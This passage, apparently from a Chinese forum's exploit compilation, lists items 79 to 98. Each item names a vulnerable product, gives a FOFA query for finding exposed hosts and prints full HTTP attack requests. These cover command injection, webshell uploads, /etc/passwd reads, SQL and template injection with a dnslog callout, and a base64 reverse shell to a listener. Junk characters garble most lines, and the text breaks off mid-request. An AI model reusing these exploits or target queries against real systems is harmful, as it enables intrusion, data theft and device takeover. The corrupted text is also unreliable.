------YsOxWxSvj1KyZow1PTsh98fdu6l2 }" w; q# w* e; i G" K1 [6 P8 X
Content-Disposition: form-data; name="target"
6 S! ^8 j$ |% E3 [" B4 P# I" Z) o- J/ Y" P3 G+ ?: f- v2 t
/Applications/SkillDevelopAndEHS/
2 e% r, X1 g+ O4 Z------YsOxWxSvj1KyZow1PTsh98fdu6l--" X1 X7 _+ m: {! v
2 m0 `+ K/ ?# {/ C2 G, ?
) c D) b% D- gGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
6 I( |& t5 m( C6 D+ J8 z0 E( iHost: x.x.x.x5 S' B& s8 K5 m; Z" {6 U
" F% \- x2 p6 U8 w8 k
+ R# | N9 e2 f) z1 ~79. BYTEVALUE 百为流控路由器远程命令执行
' L7 k$ m1 P: G; d* lFOFA:BYTEVALUE 智能流控路由器2 {1 b5 e% Q7 ?' e9 N
GET /goform/webRead/open/?path=|id HTTP/1.1# ^% A0 v. l3 J3 e$ B
Host:IP
; j' u0 F( c7 n- ^+ n9 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.09 o: s+ P+ ^* o G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: \+ z5 Y; r3 k% u1 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ } q5 n5 g. \7 ^
Accept-Encoding: gzip, deflate
* V1 h/ j) }+ i& dConnection: close
" d$ {& D) `4 a! ]/ wUpgrade-Insecure-Requests: 1
* C) Z, z$ f6 m# Q5 {3 `6 l: _( N: C, d! h* I* h8 C
- \& x: M* j z9 ?( V1 k
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
. I% X3 h$ O5 H' uFOFA:app="速达软件-公司产品"6 f2 ^$ D9 G5 b% l; r* k
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
, r# T x) `* A) ]( ]. oHost: x.x.x.x5 ^, J2 |! D: d" O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 L. P0 y: a: c% X% YContent-Length: 273 q4 ?8 c# g0 N# A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
I5 {% Y, ]. E8 N- gAccept-Encoding: gzip, deflate
' J" u8 d( A5 G; s4 t2 m- BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ N ?& g5 f2 T9 k2 e& J2 Z! uConnection: close
. R* w T2 F+ N8 D9 d9 sContent-Type: application/octet-stream: C" i/ W& B) C S
Upgrade-Insecure-Requests: 13 i( L, v+ Y+ e
' r6 o B$ u4 w! l
<% out.print("oessqeonylzaf");%>
+ U5 [/ |8 ?4 \: B$ c$ ?; y$ T/ R5 X X$ ]
8 l2 U& z ~+ p/ Y: vGET /xykqmfxpoas.jsp HTTP/1.16 f% Q6 G+ X0 o( A+ X# n" L! o
Host: x.x.x.x5 p4 s+ `" b% \3 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ ?; ]7 [1 r% {: q
Connection: close
5 t) p: n* s7 M8 g! ?6 ^. nAccept-Encoding: gzip
$ N' p+ B8 e( ~" g: C' g
* E7 U$ P& s# U! `# n4 S1 u" W" f0 O( i2 _* B r1 O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( D: O5 |+ d6 o
FOFA:app="uniview-视频监控"* H/ v, O! w p9 P; N
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1% q9 Y; k9 ]0 [- w T
Host: x.x.x.x3 D( i; m4 R+ e( D: s- W9 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; }- V7 x* l, |; R# I0 k% x7 r
Connection: close
8 ?+ B8 r% X2 Z( H. nAccept-Encoding: gzip, Q! O+ d5 g5 L; I" e2 y
1 L* t% f6 K4 u# c' V* Z2 t
+ U# A J/ g* B8 y5 |* o82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
; |/ d* B B, J! y- U- Q3 l1 J' E, mFOFA:app="思福迪-LOGBASE"- `; `, _/ m% ` [3 Q# {& W" E! ~! k
POST /bhost/test_qrcode_b HTTP/1.1% M; c1 S/ ?' u; k" Y5 d( P
Host: BaseURL4 b c: p' f* p; K* d) w2 N
User-Agent: Go-http-client/1.10 _0 u& N5 M1 C+ {. ~- f- n9 |
Content-Length: 23
& l) H. V. [# DAccept-Encoding: gzip
; b8 D) ?) K* K5 h- G! e7 ` SConnection: close
c% m4 i! o0 xContent-Type: application/x-www-form-urlencoded6 ?0 D2 W9 [, n: u8 u; `
Referer: BaseURL2 K4 F5 |& O [: w9 f* v
, k8 l) ~' j+ K, L* W7 E. ^
z1=1&z2="|id;"&z3=bhost
2 A) B! {$ r. g5 U# C% x' W+ j1 S( n9 d! N& t4 E! {" k
O& ^+ r7 q4 @/ a/ Q+ j! Z# v5 p A83. JeecgBoot testConnection 远程命令执行
' q; |: x# C2 i: z7 v9 vFOFA:title=="JeecgBoot 企业级低代码平台"% K/ D2 [- t- h9 J
P- j4 v3 b; d$ P) M$ ~
5 N3 T. [2 d' W6 h/ q9 v$ g8 `POST /jmreport/testConnection HTTP/1.1
: l- O% v3 C5 P4 {% B- R' R; THost: x.x.x.x7 N J2 o1 {% T7 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 y9 z# ~+ Z( X& I0 g
Connection: close
1 [7 J9 V) R' O5 a# z! _0 jContent-Length: 8881, d8 {3 n m5 n, R4 X
Accept-Encoding: gzip' f& y1 Y$ k! [- C% \3 G
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
2 @# C9 q* U2 Z7 \* z3 ^$ X# a1 NContent-Type: application/json
H @% ^4 u4 @
; S7 B0 C5 G) v# G2 HPAYLOAD! q0 z% u8 t+ c1 `# |4 z8 l
h% B3 }7 k$ E/ \: a* m7 A
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入6 K, ?) g% v5 J( p) G2 c, l
FOFA:title=="JeecgBoot 企业级低代码平台"& J; m9 l, ]7 K& A, }1 f9 v! W9 |
& K ?& X1 ?0 _
1 @& l3 D8 w3 A6 f2 g
8 h& O' K7 H# IPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 r8 v |7 Y: T: g+ D
Host: 192.168.40.130:8080
5 u8 C4 y/ k3 O7 ?! n1 ?; RUser-Agent: curl/7.88.19 ]1 P$ O" f0 m! D
Content-Length: 156
! s) i# D7 f* p4 E. n' \Accept: */*
+ J8 o V, i: S7 u7 V+ g9 b: JConnection: close" ?: `- R& k" f; F" [" W
Content-Type: application/json
3 I z) }0 Z# @2 U& W$ i: M# I zAccept-Encoding: gzip
. {) W- M1 M6 N4 z" L0 R2 }
+ E8 p5 K. ?$ Q$ a{
! X( D! J1 n0 e" ~* Z% X Z "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",4 Y2 i# A0 g: f, W
"type": "0"
g( q6 C& T$ H( e}
8 n& e" B6 ~/ _. q* s; \2 O% F$ w$ j8 `; r" V
9 I7 q8 Q& f. \/ c6 q85. SysAid On-premise< 23.3.36远程代码执行/ `" D/ @- x7 {) H
CVE-2023-47246
9 A% K# `2 q* K$ K' j$ DFOFA:body="sysaid-logo-dark-green.png"
- f0 J% ^3 u" E! z) @7 MEXP数据包如下,注入哥斯拉马6 }+ B" P/ `# U2 L p x7 D
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
4 [6 P V" Q" {Host: x.x.x.x
9 g8 ?3 `) u9 v6 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 L/ F7 m7 P. C9 Y& XContent-Type: application/octet-stream/ D, }& k& @ @1 H
Accept-Encoding: gzip$ U& e# X$ k0 | u& y l5 r' X* k2 a
/ k' Q: h! y* \
PAYLOAD
+ [' }% T; q5 c
! }7 }6 c$ D3 b9 ?) W回显URL:http://x.x.x.x/userfiles/index.jsp- r5 b$ `) f' A* P- i' w
& V0 r, A |5 g g5 \
86. 日本tosei自助洗衣机RCE6 X, r% z6 _( J7 h! V
FOFA:body="tosei_login_check.php"8 u5 q* e+ L3 O z; N; q. e
POST /cgi-bin/network_test.php HTTP/1.1, q1 t2 U3 X! f! x9 v3 \& A( T! e
Host: x.x.x.x2 I) I/ U/ N, y7 O( Y# w3 M
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
" g/ k- @: Q" L1 x6 V2 l! N) ]! NConnection: close5 a8 d5 }0 e0 s# j$ L
Content-Length: 44/ Q- C, ]: Z& r, R# {
Accept: */*
7 A; K4 ?" h& v1 P/ i9 N# lAccept-Encoding: gzip' }8 F3 \5 k8 w& j+ H. ^
Accept-Language: en7 N9 | ]6 f6 D7 e
Content-Type: application/x-www-form-urlencoded" W1 _6 y8 X- w
) `4 t# x9 K7 t
host=%0acat${IFS}/etc/passwd%0a&command=ping8 S* }; q* d9 n; j7 m4 Y
0 p) I4 n# w2 r5 D% F% W4 P" _! E* L0 r( `
: P8 `+ A) Q2 v6 I! b2 m87. 安恒明御安全网关aaa_local_web_preview文件上传
) J$ G" }7 n/ w, gFOFA:title="明御安全网关"
* G! b! m! V" Y9 k* x8 APOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
3 {) e7 I' \* p" W" D% x) {Host: X.X.X.X
2 T/ x3 l& i: z2 L( l. d$ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 U _3 `* g, d K6 tConnection: close
$ x% X( m% E; G5 y- P+ \! AContent-Length: 1988 l! s: j! g6 H* ^6 _- \
Accept-Encoding: gzip
( C$ h" ~* J; G5 qContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, m. D; V3 Y$ Q, V; E2 Y; r. d( R* L! w+ D
--qqobiandqgawlxodfiisporjwravxtvd) |# N. X; I2 \
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"; p( Y' B3 r/ _& o1 M7 t9 F
Content-Type: text/plain
: [0 X# B" o+ u4 L$ A
; \- |/ }! L _' @4 k2ZqGNnsjzzU2GBBPyd8AIA7QlDq1 e- ?! j# `: R, {- N. E
--qqobiandqgawlxodfiisporjwravxtvd--
* Z/ Q. u" u4 Y- c7 b0 m# D
6 R+ x) n: V# V. p" ]8 u; [( L# [$ o! m
/jfhatuwe.php
\( ~! b. s: L3 K; ] @) K/ E! M- O+ a% w
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行( t. l) q0 b1 \% L
FOFA:title="明御安全网关"
& i+ i* ]* c( R! u3 L$ mGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.14 ?; |! u+ s7 n8 A% ^
Host: x.x.x.xx.x.x.x k) t6 \; T& j9 k' D, V' D! e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" W" w7 ^8 y, R- W' j6 e3 U% ` \5 H' ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: z' D' [8 C8 T& u- nAccept-Encoding: gzip, deflate
/ T5 H+ z% t2 L' K5 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- v9 H( Y, ~5 n) |; B8 M5 j& n
Connection: close
- W, A7 G P! `3 h
l4 Q$ _+ c, V6 g6 a; X: J7 l9 Q5 G7 f7 X3 {- S+ f+ }7 v
/astdfkhl.php; N0 J- P: `& D5 J" t9 E
9 h# X+ T! E' H, {6 P
89. 致远互联FE协作办公平台editflow_manager存在sql注入7 _1 b+ X4 o& H% d
FOFA:title="FE协作办公平台" || body="li_plugins_download"
0 N+ R/ G, F1 m# V& O! |$ LPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
1 I2 O* w' T# F! ^. b5 VHost: x.x.x.x9 a* P2 h% g: F( |" N2 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 \( I i: X" O! R- e8 d6 CConnection: close! {( ?8 \: }/ X! t5 E
Content-Length: 41
2 S# S' F. o- m! x8 {Content-Type: application/x-www-form-urlencoded
% ]* }5 p+ D4 a0 a) N! ZAccept-Encoding: gzip
$ `" i5 E7 M- m3 I* D$ w* F1 Y
) l& F; X# }5 W( z6 W' e& h9 Zoption=2&GUID=-1'+union+select+111*222--+
! }. z! U3 G( n
6 g. ^9 w# P3 a* M0 J+ d Z+ a' S' z* {: [
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行+ i$ M) p3 O0 F4 I; {. m; V* x
FOFA:icon_hash="-1830859634"6 f# Y: I% p3 D
POST /php/ping.php HTTP/1.1
8 p6 k# _. C. }! D$ H2 IHost: x.x.x.x. p4 [6 Y: w7 l( ^; e6 h u& q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 j; i0 k6 C1 K: i% _" MContent-Length: 51
( s1 ^ \4 M- |- V* pAccept: application/json, text/javascript, */*; q=0.013 T* q# V/ B2 V* o
Accept-Encoding: gzip, deflate+ ~3 Y b# W, k4 g- W( j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! p1 j$ p$ k3 r, C JConnection: close
" z7 `* |- d% Z" J: {9 hContent-Type: application/x-www-form-urlencoded! \8 d* v' S$ p7 @* K
X-Requested-With: XMLHttpRequest
7 A1 f6 g2 j$ x9 R& g9 j
' m5 ?' _; E! ?- F& xjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
& R, L! U2 w s4 C! V6 S) [% d$ [, u3 u* P0 D
. \' M( e2 J8 P7 @& T. C91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# Z w, |, j- k( L S6 d6 S) ~
FOFA:title="综合安防管理平台"1 Z8 P$ ~7 c, N7 v+ s" |
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' m5 k- y5 i0 Y
Host: your-ip
6 O! x/ l, V5 c: e" R8 M% bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" T8 z5 s& W. N( \
Accept-Encoding: gzip, deflate
% w" h3 O. b/ y. d; k( _( b0 ?Accept: */** w$ G. c& S3 P
Connection: keep-alive
1 C, Q" F+ Q: f1 j) D
, w6 [3 H* p% @( h S; ?( V. P; w0 `! e! ?; T$ j8 R
% y. f" j9 `; P4 L9 s9 {% B4 Q
92. 海康威视运行管理中心session命令执行 ~+ H d: ~% E. D- X' L/ s
Fastjson命令执行/ g/ G, P4 c/ x, x
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
$ q: T6 }+ C! b" ~7 V* YPOST /center/api/session HTTP/1.1
& X5 F2 Y4 h4 x: q; @, q1 d% _Host:
3 i, |1 F9 [# `; O1 t2 \ |Accept: application/json, text/plain, */*
% ~" N& z$ _5 y O( IAccept-Encoding: gzip, deflate: H( ?% L3 ^. O% `' z+ d
X-Requested-With: XMLHttpRequest0 t* x- I- Q) \! d% S3 f
Content-Type: application/json;charset=UTF-8) g5 Y8 m5 g: g. M2 q
X-Language-Type: zh_CN
0 {2 O" ~1 c& k8 oTestcmd: echo test/ ^; r: c6 B) D8 F: L4 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
; {1 y5 B1 D3 L3 DAccept-Language: zh-CN,zh;q=0.9. t; T- e0 ^2 {, ?
Content-Length: 5778; a; A Y: J' a, w- K0 z/ `! I
3 W* l/ ]$ U! WPAYLOAD
3 X' D. R- d4 i5 p9 k7 l$ Y) b5 d7 F& ?' G1 O* r" d
8 j& h0 e. F1 g93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
3 N! f, k+ h2 s% D8 M2 N: D$ XFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="* R1 |, J8 Q( |* z9 e [1 \# P& e( H
POST /?g=app_av_import_save HTTP/1.1
4 l: D0 f* a& U% i- s9 U7 YHost: x.x.x.x
% q) @, m$ d% qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
- B4 z6 S2 T) x& W6 PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. e& N8 e; {& h: w/ {. w/ E. e7 N7 w+ C! e& K. {* Y& y2 h
------WebKitFormBoundarykcbkgdfx
, n# T& [/ x# l3 y5 S' N+ w7 O; yContent-Disposition: form-data; name="MAX_FILE_SIZE"% W6 H( o. }) Y$ m
5 f7 n8 W3 [9 {* d10000000- w) X) R7 g3 [2 I; v- b1 p
------WebKitFormBoundarykcbkgdfx! r% X( ]( Y# `
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt" P& b/ ]1 K6 y2 G9 B0 n+ c4 u
Content-Type: text/plain
& X6 m& r3 \% K# c# N$ x
+ J; c- e9 A/ H* Gwagletqrkwrddkthtulxsqrphulnknxa! K, x3 q( |; q
------WebKitFormBoundarykcbkgdfx
$ L; n; c9 `5 `# U) ?5 v; k) zContent-Disposition: form-data; name="submit_post"
$ v& j! }0 Z6 }1 T) _% x
# r {- X& i3 B+ O; a$ ?4 robj_app_upfile
7 k6 }1 A O k4 U& X------WebKitFormBoundarykcbkgdfx3 k7 f+ J, F6 b* d: Y' k
Content-Disposition: form-data; name="__hash__"% S2 \: i5 u1 ]
- S' n9 v1 M/ N2 t0b9d6b1ab7479ab69d9f71b05e0e9445 `8 K" ]- b$ s& s, r9 f
------WebKitFormBoundarykcbkgdfx--. v* z4 i- H- j9 y# S4 i0 X
2 I: U% S7 o- @3 _* ?, T/ g
7 c/ E% [0 M- D- p7 O2 m6 [) uGET /attachements/xlskxknxa.txt HTTP/1.1
$ T7 ?8 n7 A8 e/ XHost: xx.xx.xx.xx0 C# {6 g0 }' w+ [
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ h. d" F: f& W" i
& I) q, c* |$ l6 I. X; v
+ S9 K; p7 i% Y* o7 e) y94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
$ ] _- B& N! @3 hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": t8 V) k f/ m$ N, i m1 P8 P
POST /?g=obj_area_import_save HTTP/1.1" }3 R+ I7 ~5 a7 i
Host: x.x.x.x# g2 @$ g9 A" f, t) |* C! Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
+ _/ z! D6 Z- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 C& ~' M/ y% P8 G/ z
- h8 W+ c) K3 b" F3 c5 f
------WebKitFormBoundarybqvzqvmt6 s- w4 d3 i7 U. D4 y6 g
Content-Disposition: form-data; name="MAX_FILE_SIZE"6 ~$ [7 t' a* _( l$ p( Q
T6 C4 s8 u* R1 @7 [4 U% g9 S6 ?
10000000
7 Z' T* [4 s" q" Y1 }1 z% @------WebKitFormBoundarybqvzqvmt4 M9 g2 r) x% l1 r8 g' E2 Z
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
, C; ]% q( }+ {# EContent-Type: text/plain
9 P* G% T- Y; N5 q; Y& G
( V4 \5 b5 R* b* S4 [# xpxplitttsrjnyoafavcajwkvhxindhmu
& K' K. l* @( t5 y' i------WebKitFormBoundarybqvzqvmt
6 B) q7 G8 v. N1 BContent-Disposition: form-data; name="submit_post"
# G2 a# i' h8 X+ n- l4 S" F/ j m
obj_app_upfile
% ^! d$ ]( s7 `6 N------WebKitFormBoundarybqvzqvmt
9 e0 z% Z' x3 a" x4 x& |+ yContent-Disposition: form-data; name="__hash__". G4 |% R, X) m
# L2 E* U8 y! |9 _
0b9d6b1ab7479ab69d9f71b05e0e9445
' i, {, E5 ~" D+ J; S( | F------WebKitFormBoundarybqvzqvmt--7 Z, Q6 j+ E i% T& |! r5 n
* j! I4 m" c7 r
! n8 _5 ?4 B8 d2 v1 i9 s
1 V% w, D# E# t, A" J( SGET /attachements/xlskxknxa.txt HTTP/1.14 L/ \/ `3 n: w/ A6 C
Host: xx.xx.xx.xx
3 _% _/ y6 a! G* b/ o8 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- Z. y$ B/ x! c8 |- Y% e- d D- d# Y( ?1 C/ [" A0 A
- N2 [/ d& v: _0 S( k( u; S- M' m" y- C2 u5 A
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
% r3 E: s5 I1 h% V; S4 y3 ECVE-2023-49070
6 _! ^% y' O# m0 G& ~0 x7 ^FOFA:app="Apache_OFBiz"- {9 I8 H4 e; Y
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, E f" q" o9 n; R6 K$ a9 a8 oHost: x.x.x.x1 Q5 w# J/ h6 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! s* }' P7 T7 Z! V
Connection: close
1 S3 n$ y8 ]3 m% y& w9 }Content-Length: 8899 I7 l0 z S+ z" S3 G2 g
Content-Type: application/xml
# b0 J9 t( S* L# R/ g, {Accept-Encoding: gzip
8 w9 B1 O* E3 ]3 \& c p8 V; R, I: O$ Q% u( M Q# | e
<?xml version="1.0"?>
3 g/ v Y' a8 {) i5 i. a<methodCall>
$ f6 s" ]4 D: L4 u6 x) o <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
/ h0 r( m; J8 Y: t/ p6 n( K x <params>5 D& S9 l1 F: H; Y( Z0 t
<param>. M3 [0 x6 z* l2 N* \; b
<value>
$ ^& u- {$ ^, H3 J <struct>
2 g4 _4 w4 Z7 W+ I( v6 Q6 j( B <member>' Q6 n! i& w, k/ n6 `! m1 `" P
<name>test</name>, r2 `3 X8 X& I g A8 i7 X
<value>- v( z$ z% M1 G: e& x0 x" n% w; A
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>( F v6 Y2 o& l/ a, e6 ^
</value>
6 N) A, u( l0 X7 Z6 v7 r$ E </member>
& P R) U0 P+ S2 G# {% n: I, w </struct>
6 P3 I9 w; X" q2 ~9 p </value>
: Y& t9 p4 s( e: v </param>
& B' _" k$ J4 g4 x' f </params>
" N! h0 t2 w% W" `1 z</methodCall>
) B8 D) e4 p6 c; ^
6 P( {8 g' [; C( x
* p5 d- ^# X1 S$ ? `8 S. ^用ysoserial生成payload8 [ T ]* x7 y6 z$ w
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
- j8 [1 }4 B `3 h/ ]
3 r& @/ a+ ]1 F/ F6 A+ g5 e9 z1 M5 D
将生成的payload替换到上面的POC
3 z. T3 B: m* a. Y/ U9 D9 hPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 `9 W+ J8 r( H& a! Q) I: F9 O
Host: 192.168.40.130:8443: c0 t# p+ p2 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- j/ H3 ]& V# r8 M
Connection: close8 a- w1 v7 ] u: o; R' }$ ^
Content-Length: 889" S: c+ O3 Z6 g+ M- d
Content-Type: application/xml
% G% [$ `0 y% ]4 VAccept-Encoding: gzip
1 S- Q0 a6 Z5 y& R$ B, l
! B# J7 V& T* w" a1 f* }* ~& w1 NPAYLOAD
( C7 \4 A; P3 M3 Y" ~
: g1 Q6 h& `4 w; F& l96. Apache OFBiz 18.12.11 groovy 远程代码执行4 h* m+ J$ S0 K1 P8 z; y. u9 z1 A
FOFA:app="Apache_OFBiz"
9 S E0 q5 Q- R4 f$ m; d6 x* wPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
4 ^6 U: D, G* P/ {1 RHost: localhost:8443
Y `; b/ w ~0 c: OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# x# W2 Y l2 S- d$ P4 E* A! mAccept: */*
' u* O" \" [) _- F: h. f9 `4 z! V# OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 {% ] k4 v, A" L4 k( M# b1 bContent-Type: application/x-www-form-urlencoded
1 m; j. W1 A" N. Q# g. G7 OContent-Length: 552 A" A: Y0 v2 Z4 g1 f- ^
% B! l0 s7 }1 W' ^( P* I2 r+ CgroovyProgram=throw+new+Exception('id'.execute().text);$ z& c' W' e: W! s
' ^: J% p+ k% V' X" Z
! g. F* ]" v4 x, S反弹shell' D e& T7 [$ e" j, l# C
在kali上启动一个监听
, ?9 B' Z1 k# z& k4 cnc -lvp 7777* Q F4 f1 z r* \
& N4 L9 K- O* l
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% U9 C% V5 u. _% j" j
Host: 192.168.40.130:84435 w4 V3 ?( \2 b3 A4 i7 N* D1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' u8 E4 _2 X3 E/ [ ^* R. ]+ g1 GAccept: */*
0 Z$ H2 l- d6 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! e/ ?+ v/ P& i1 Z s
Content-Type: application/x-www-form-urlencoded
# p1 c1 F) v0 i. [' p* Q3 LContent-Length: 71. C* p# k7 h$ f0 M
' u0 b& {( t; F& L5 W1 y+ S
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();' J/ o% [- w9 x" h- b
3 s. p6 f! E1 B2 H9 N
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行3 H' x# T, G& X" m
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
! n; R+ a' {( G* _6 f7 Y& @( n: MGET /passport/login/ HTTP/1.15 k1 U6 [- g( U% S
Host: 192.168.40.130:80851 m3 L# o% m& y4 J+ M2 R/ R' H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 H' y9 f% N8 t* k7 @/ bAccept-Encoding: gzip, ^* o, ~" T2 `: A; Z
Connection: close. m9 w" ] p, Y2 r/ m3 B9 n
Cookie: rememberMe=PAYLOAD
: m- U, T* P: `8 P. V; ?X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"/ r3 B" ~+ }; V& p0 Z
; N% l6 T9 o. O9 h2 l/ U; E# L/ T* [0 i' z
98. SpiderFlow爬虫平台远程命令执行
0 l' r; w6 q t5 {! P' HCVE-2024-0195
9 h; S: U, D& \FOFA:app="SpiderFlow"
d- g$ m( ~, hPOST /function/save HTTP/1.1
. `7 q- N( ]$ j3 A0 j% h& _# aHost: 192.168.40.130:80885 @- m# p0 p! ?+ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 i& `2 Y9 U5 t$ K2 x( E
Connection: close+ w7 Z3 X* h, h" t; B6 B
Content-Length: 1219 r: A5 _+ {9 Z8 t, e" U* o
Accept: */*& W' u9 T( @" U& B7 @; r! {
Accept-Encoding: gzip, deflate; {. u: u0 o; n, N
